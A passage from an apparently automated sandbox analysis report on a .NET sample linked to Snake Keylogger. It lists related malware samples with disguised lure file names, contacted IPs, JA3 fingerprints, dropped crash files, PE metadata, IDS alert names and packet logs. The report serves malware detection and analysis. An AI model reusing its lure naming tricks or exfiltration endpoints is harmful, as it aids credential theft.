                                                                                  TELEGRAMRU#docs_8299010377388200191-pdf.jsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 149.154.167.220
                                                                                  Dekont.rar.xlxs.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 149.154.167.220
                                                                                  http://brawllstars.ru/Get hashmaliciousHTMLPhisherBrowse
                                                                                  • 149.154.167.99
                                                                                  https://telagremn.com/Get hashmaliciousUnknownBrowse
                                                                                  • 149.154.167.99
                                                                                  http://tg.hispa-net.com/Get hashmaliciousUnknownBrowse
                                                                                  • 149.154.167.99
                                                                                  http://www.traderstv.net/Get hashmaliciousUnknownBrowse
                                                                                  • 149.154.167.99
                                                                                  http://kapahereyupa.life/Get hashmaliciousUnknownBrowse
                                                                                  • 149.154.167.99
                                                                                  http://sg2.putrivpn.us.kg/Get hashmaliciousUnknownBrowse
                                                                                  • 149.154.167.99
                                                                                  https://telegramsexx21.pages.dev/Get hashmaliciousPorn ScamBrowse
                                                                                  • 149.154.167.99
                                                                                  https://investors.spotify.com.id6.tingkehvpn.us.kg/Get hashmaliciousUnknownBrowse
                                                                                  • 149.154.167.99
                                                                                  CLOUDFLARENETUSRFQ 2024.09.26-89 vivecta.vbsGet hashmaliciousPureLog StealerBrowse
                                                                                  • 172.66.0.235
                                                                                  Payment Advice.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • 188.114.96.3
                                                                                  Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • 188.114.97.3
                                                                                  RTGS-WB-ABS-240730-NEW.lnkGet hashmaliciousAgentTeslaBrowse
                                                                                  • 172.67.74.152
                                                                                  #docs_8299010377388200191-pdf.jsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 162.159.129.233
                                                                                  AGMETIGA zapytanie ofertowe.xlsGet hashmaliciousPureLog StealerBrowse
                                                                                  • 172.67.179.215
                                                                                  175-33-26-24.HTA.htaGet hashmaliciousUnknownBrowse
                                                                                  • 104.16.231.132
                                                                                  Dekont.rar.xlxs.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 188.114.97.3
                                                                                  dekont.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • 188.114.97.3
                                                                                  Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • 188.114.97.3
                                                                                  ORACLE-BMC-31898USPayment Advice.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • 158.101.44.242
                                                                                  Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • 193.122.130.0
                                                                                  Dekont.rar.xlxs.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 158.101.44.242
                                                                                  dekont.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • 158.101.44.242
                                                                                  Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • 193.122.130.0
                                                                                  REMITTANCE ADVICE.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • 158.101.44.242
                                                                                  z64BLPL.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 193.122.6.168
                                                                                  TLS20242025.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 193.122.130.0
                                                                                  purchase order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • 158.101.44.242
                                                                                  SecuriteInfo.com.Win32.CrypterX-gen.6879.11943.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 158.101.44.242

                                                                                  JA3 Fingerprints

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  54328bd36c14bd82ddaa0c04b25ed9adZiraat Bankasi Swift Mesaji.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • 188.114.97.3
                                                                                  #docs_8299010377388200191-pdf.jsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 188.114.97.3
                                                                                  Dekont.rar.xlxs.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 188.114.97.3
                                                                                  dekont.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • 188.114.97.3
                                                                                  Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • 188.114.97.3
                                                                                  QUOTATION_SEPQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • 188.114.97.3
                                                                                  SecuriteInfo.com.Adware.DownwareNET.4.15389.24193.exeGet hashmaliciousUnknownBrowse
                                                                                  • 188.114.97.3
                                                                                  SecuriteInfo.com.Adware.DownwareNET.4.15389.24193.exeGet hashmaliciousUnknownBrowse
                                                                                  • 188.114.97.3
                                                                                  z64BLPL.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 188.114.97.3
                                                                                  TLS20242025.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 188.114.97.3
                                                                                  3b5074b1b5d032e5620f69f9f700ff0eTeklif-6205018797-6100052155-UUE.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  • 149.154.167.220
                                                                                  RFQ 2024.09.26-89 vivecta.vbsGet hashmaliciousPureLog StealerBrowse
                                                                                  • 149.154.167.220
                                                                                  RTGS-WB-ABS-240730-NEW.lnkGet hashmaliciousAgentTeslaBrowse
                                                                                  • 149.154.167.220
                                                                                  #docs_8299010377388200191-pdf.jsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 149.154.167.220
                                                                                  Dekont.rar.xlxs.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 149.154.167.220
                                                                                  https://ojbkjs.vip/yb.jsGet hashmaliciousUnknownBrowse
                                                                                  • 149.154.167.220
                                                                                  QUOTATION_SEPQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • 149.154.167.220
                                                                                  file.exeGet hashmaliciousUnknownBrowse
                                                                                  • 149.154.167.220
                                                                                  Purchase order.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  • 149.154.167.220
                                                                                  https://jbrizuelablplegal.taplink.ws/Get hashmaliciousHTMLPhisherBrowse
                                                                                  • 149.154.167.220

                                                                                  Dropped Files

                                                                                  No context

                                                                                  Created / dropped Files

                                                                                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_2SSM3MSIR0DTTRQ2_504a3634ea5f948835717bb7b0f19bfc2412817f_35627730_24d8b2c5-b163-42cf-9ebb-b8dff9900c0d\Report.wer

                                                                                  Download File
                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):65536
                                                                                  Entropy (8bit):1.2327646232540128
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:S0CQMBYscDRb0BU/KaGyFuyRCzuiFWZ24IO8x:GwsoeBU/KaVPRCzuiFWY4IO8x
                                                                                  MD5:0BEB4EF1C4704A1F31B7B0FA9DE92B7D
                                                                                  SHA1:AE8B8127BB80F96B7CB762EC21D736077143B5ED
                                                                                  SHA-256:45B41520305A46B60956289697C0530439614721C4351DAA9D9E8696E2D06C73
                                                                                  SHA-512:F25963BE024F3B6AA13B3F33DD7DD82E1F01F2A19AB00584F00EF57C02FF0EFB7F9738BA5DC033DC6987C2DE89719B73158846DB543E916BBBC6807924CD8BB5
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.1.9.0.0.4.6.2.0.2.4.6.4.0.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.1.9.0.0.4.6.3.7.1.2.1.4.5.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.4.d.8.b.2.c.5.-.b.1.6.3.-.4.2.c.f.-.9.e.b.b.-.b.8.d.f.f.9.9.0.0.c.0.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.f.8.6.5.9.3.1.-.9.4.c.3.-.4.7.e.e.-.8.8.a.5.-.f.c.d.5.9.d.c.d.3.d.9.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.1.7.2.7.4.2.6.2.8.6.c.f.4.6.9.6.7.5.e.3.a.7.f.a.e.4.3.b.5.e.2.e.f.c.c.1.5.6.3.9.a.e.0.8.e.5.0.6.7.d.e.3.6.f.3.1.2.9.e.2.e.b.6.7.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.e.m.i.n.g.t.o.n...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.6.c.-.0.0.0.1.-.0.0.1.4.-.0.c.e.8.-.9.6.e.1.b.9.1.0.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.9.8.8.e.2.8.5.0.b.2.7.a.5.1.4.0.b.2.b.b.f.4.8.3.c.d.7.9.b.

                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER1929.tmp.dmp

                                                                                  Download File
                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                  File Type:Mini DuMP crash report, 15 streams, Fri Sep 27 08:47:43 2024, 0x1205a4 type
                                                                                  Category:dropped
                                                                                  Size (bytes):335543
                                                                                  Entropy (8bit):3.473875774787412
                                                                                  Encrypted:false
                                                                                  SSDEEP:3072:lEZr/wycCXaIoVT+JxJXfKdJGDbf4uEqeNWLTglOnThN:lEZEyraI+SJxJX+0bf4RUTgl6
                                                                                  MD5:0F5BD37B2373B078F1F9CEE26E05C5F7
                                                                                  SHA1:1F26272E18D4CD81C951EF0A7AA9A177C23BC3ED
                                                                                  SHA-256:9DF49C62914D66216A0EAF4EA77C1EFB72953EB486C91EDE77EECAFECAF1D21F
                                                                                  SHA-512:9BB000B7EFA8656CC36E7A1C7739450B32E7E74129F30A93E52D5A37822132B75934CF5895E8165DAEFEA85DCB38699A323F6C3DD806B6F264F94B243CC9549D
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:MDMP..a..... ......./q.f............4............ ..H.......<...\*......t)...i..........`.......8...........T............X...............*...........,..............................................................................eJ.......-......GenuineIntel............T.......l....q.f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER1EB8.tmp.WERInternalMetadata.xml

                                                                                  Download File
                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):8624
                                                                                  Entropy (8bit):3.7081594073212356
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:R6l7wVeJEW65nr6YNRSUplgmfZJEGprq89bm7sfiAim:R6lXJ965nr6YLSUplgmfkYmAfiE
                                                                                  MD5:9218E65E651B96FB56284C70B7846E8D
                                                                                  SHA1:05DDE774538188B9350CDCDCC1A47A6D10E59914
                                                                                  SHA-256:6FDB882B8AC448C577DB01C7A4941674C641491EC7182F795DAB0671901EE65E
                                                                                  SHA-512:E1C8F6F809E80A644603DDAD9A62A45887CE949974F70270343BD2E5AB8FDBC1C6D1C5567DA8512BE47B824FD0F86929C6D94A7503273C9B2763E9B440E26581
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.7.6.4.<./.P.i.

                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER1EF7.tmp.xml

                                                                                  Download File
                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):5004
                                                                                  Entropy (8bit):4.600265148840576
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:cvIwWl8zsYJg77aI99qWpW8VYjkjYm8M4JxYoJFb+q8vXSQAxfQfLId:uIjfeI7DL7VR2JxjKijfQfkd
                                                                                  MD5:0C05A3147DC08149272D34C23FA287C1
                                                                                  SHA1:79A0E8406B3A48F350168789609867414E899DAE
                                                                                  SHA-256:5DAADCE804753D8695F06D44D6DBA8B877C9C56E1032A0E8A05B3A568FD7776C
                                                                                  SHA-512:4B52A90F8FB4E2D8962578DCB741525C643039D083996B658C0DA3C561DCB02120235858776813D2FBE1A6F6D6A3440D9BD9D62D72E938FB807725A129E21B2A
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="518390" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                  C:\Windows\appcompat\Programs\Amcache.hve

                                                                                  Download File
                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                  File Type:MS Windows registry file, NT/2000 or above
                                                                                  Category:dropped
                                                                                  Size (bytes):1835008
                                                                                  Entropy (8bit):4.417255435985839
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:4cifpi6ceLPL9skLmb0mQSWSPtaJG8nAgex285i2MMhA20X4WABlGuNA5+:ti58QSWIZBk2MM6AFB6o
                                                                                  MD5:A3DC8F5250BDA2178B2C6C31AD33C0DD
                                                                                  SHA1:F7898F19AEAF1894F9371D27F04F20D2FE5D3846
                                                                                  SHA-256:9DB665242E5B184AB23472620E2DF3F79D584AE63B2F9B3BA4EAF73F1242934D
                                                                                  SHA-512:DAAA423F857C05BD148734E543C97ACA0A7608B8ABCFA3CC39DADD4AF22330F3C76F306870A3601768AF63EC978E8931035E1F928C739649A09D2CB037545AED
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:regfE...E....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.r.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  Static File Info

                                                                                  General

                                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Entropy (8bit):5.61892036333007
                                                                                  TrID:
                                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.79%
                                                                                  • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                  • Windows Screen Saver (13104/52) 0.07%
                                                                                  • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                                                  File name:1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe
                                                                                  File size:279'040 bytes
                                                                                  MD5:b046211fe3f420a9ceb7663a560ece96
                                                                                  SHA1:785a1cff39f2a75cbfffed3d718e9e026b3c80a1
                                                                                  SHA256:96134c810750cc56e372551f8070f06aee80ae0cc8eeac983502d6b8f66c77df
                                                                                  SHA512:5a0fc701606682de24dfc1b8408b6d7c13205952128b211b9b7ef11a97871f2590d7c705b4032eab6a5661a1295fe4bc8bb58418b68e999e8fdd315009ca7eb3
                                                                                  SSDEEP:3072:lL6hDp5qqQjolo+XgVfXACCBc9jKnfL83mwnbItgQ2eXPs0lUY/VgMiObbY:gn5wnb+gWxb
                                                                                  TLSH:7654841D2BD49810E2FF8977C2B65125C6BBB4A346258D3E16D1E81A3F3E580DE06F63
                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f..............P..,...........K... ...`....@.. ....................................@................................

                                                                                  File Icon

                                                                                  Icon Hash:00928e8e8686b000

                                                                                  Static PE Info

                                                                                  General

                                                                                  Entrypoint:0x444b0e
                                                                                  Entrypoint Section:.text
                                                                                  Digitally signed:false
                                                                                  Imagebase:0x400000
                                                                                  Subsystem:windows gui
                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                  Time Stamp:0x669085D9 [Fri Jul 12 01:24:41 2024 UTC]
                                                                                  TLS Callbacks:
                                                                                  CLR (.Net) Version:
                                                                                  OS Version Major:4
                                                                                  OS Version Minor:0
                                                                                  File Version Major:4
                                                                                  File Version Minor:0
                                                                                  Subsystem Version Major:4
                                                                                  Subsystem Version Minor:0
                                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                  Entrypoint Preview

                                                                                  Instruction
                                                                                  jmp dword ptr [00402000h]
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al

                                                                                  Data Directories

                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x44abc0x4f.text
                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x460000x1017.rsrc
                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x480000xc.reloc
                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                  Sections

                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                  .text0x20000x42b140x42c00d36eabe48ced213e9155dfdc9f9efb9bFalse0.21219935042134833SysEx File -5.620523978083059IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                  .rsrc0x460000x10170x120078b97a769c57cf460625c961b04b1a16False0.3543836805555556data4.76801789588623IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                  .reloc0x480000xc0x2000f43dd090ca3c812d8980b8f7ea3aff8False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                  Resources

                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                  RT_VERSION0x460a00x31cdata0.4271356783919598
                                                                                  RT_MANIFEST0x463bc0xc5bXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.3926651912741069

                                                                                  Imports

                                                                                  DLLImport
                                                                                  mscoree.dll_CorExeMain

                                                                                  Network Behavior

                                                                                  Suricata IDS Alerts

                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                  2024-09-27T10:47:30.112737+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749699158.101.44.24280TCP
                                                                                  2024-09-27T10:47:31.175032+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749699158.101.44.24280TCP
                                                                                  2024-09-27T10:47:31.786222+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749701188.114.97.3443TCP
                                                                                  2024-09-27T10:47:32.424999+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749702158.101.44.24280TCP
                                                                                  2024-09-27T10:47:32.974719+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749703188.114.97.3443TCP
                                                                                  2024-09-27T10:47:34.175636+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749705188.114.97.3443TCP
                                                                                  2024-09-27T10:47:38.978463+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749713188.114.97.3443TCP

                                                                                  Network Port Distribution

                                                                                  TCP Packets

                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Sep 27, 2024 10:47:29.289355993 CEST4969980192.168.2.7158.101.44.242
                                                                                  Sep 27, 2024 10:47:29.294223070 CEST8049699158.101.44.242192.168.2.7
                                                                                  Sep 27, 2024 10:47:29.294298887 CEST4969980192.168.2.7158.101.44.242
                                                                                  Sep 27, 2024 10:47:29.294574976 CEST4969980192.168.2.7158.101.44.242
                                                                                  Sep 27, 2024 10:47:29.299377918 CEST8049699158.101.44.242192.168.2.7
                                                                                  Sep 27, 2024 10:47:29.910844088 CEST8049699158.101.44.242192.168.2.7
                                                                                  Sep 27, 2024 10:47:29.915019035 CEST4969980192.168.2.7158.101.44.242
                                                                                  Sep 27, 2024 10:47:29.919962883 CEST8049699158.101.44.242192.168.2.7
                                                                                  Sep 27, 2024 10:47:30.066852093 CEST8049699158.101.44.242192.168.2.7
                                                                                  Sep 27, 2024 10:47:30.112736940 CEST4969980192.168.2.7158.101.44.242
                                                                                  Sep 27, 2024 10:47:30.136713028 CEST49700443192.168.2.7188.114.97.3
                                                                                  Sep 27, 2024 10:47:30.136749983 CEST44349700188.114.97.3192.168.2.7
                                                                                  Sep 27, 2024 10:47:30.136864901 CEST49700443192.168.2.7188.114.97.3
                                                                                  Sep 27, 2024 10:47:30.146043062 CEST49700443192.168.2.7188.114.97.3
                                                                                  Sep 27, 2024 10:47:30.146065950 CEST44349700188.114.97.3192.168.2.7
                                                                                  Sep 27, 2024 10:47:30.625891924 CEST44349700188.114.97.3192.168.2.7
                                                                                  Sep 27, 2024 10:47:30.626159906 CEST49700443192.168.2.7188.114.97.3
                                                                                  Sep 27, 2024 10:47:30.632381916 CEST49700443192.168.2.7188.114.97.3
                                                                                  Sep 27, 2024 10:47:30.632405043 CEST44349700188.114.97.3192.168.2.7
                                                                                  Sep 27, 2024 10:47:30.632764101 CEST44349700188.114.97.3192.168.2.7
                                                                                  Sep 27, 2024 10:47:30.675134897 CEST49700443192.168.2.7188.114.97.3
                                                                                  Sep 27, 2024 10:47:30.684118032 CEST49700443192.168.2.7188.114.97.3
                                                                                  Sep 27, 2024 10:47:30.731405973 CEST44349700188.114.97.3192.168.2.7
                                                                                  Sep 27, 2024 10:47:30.793179989 CEST44349700188.114.97.3192.168.2.7
                                                                                  Sep 27, 2024 10:47:30.793287039 CEST44349700188.114.97.3192.168.2.7
                                                                                  Sep 27, 2024 10:47:30.793457031 CEST49700443192.168.2.7188.114.97.3
